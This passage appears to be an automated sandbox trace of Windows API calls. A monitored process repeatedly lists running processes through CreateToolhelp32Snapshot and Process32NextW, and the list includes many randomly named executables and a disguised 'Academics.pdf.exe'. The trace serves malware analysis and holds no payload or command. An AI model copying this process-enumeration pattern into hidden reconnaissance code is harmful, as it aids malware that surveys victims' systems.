th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0284.087] CloseHandle (hObject=0x294) returned 1 [0284.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0284.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0284.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0284.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0284.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0284.087] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0284.087] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0284.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0284.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0284.089] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0284.092] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.102] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.103] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0284.104] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0284.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0284.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0284.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0284.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0284.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0284.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0284.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0284.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0284.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0284.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0284.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0284.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0284.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0284.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0284.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0284.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0284.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0284.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0284.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0284.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0284.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.140] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0284.140] CloseHandle (hObject=0x294) returned 1 [0284.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0284.141] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.141] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0284.143] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.146] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.147] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.148] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.150] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0284.152] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.155] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0284.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.162] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0284.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0284.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 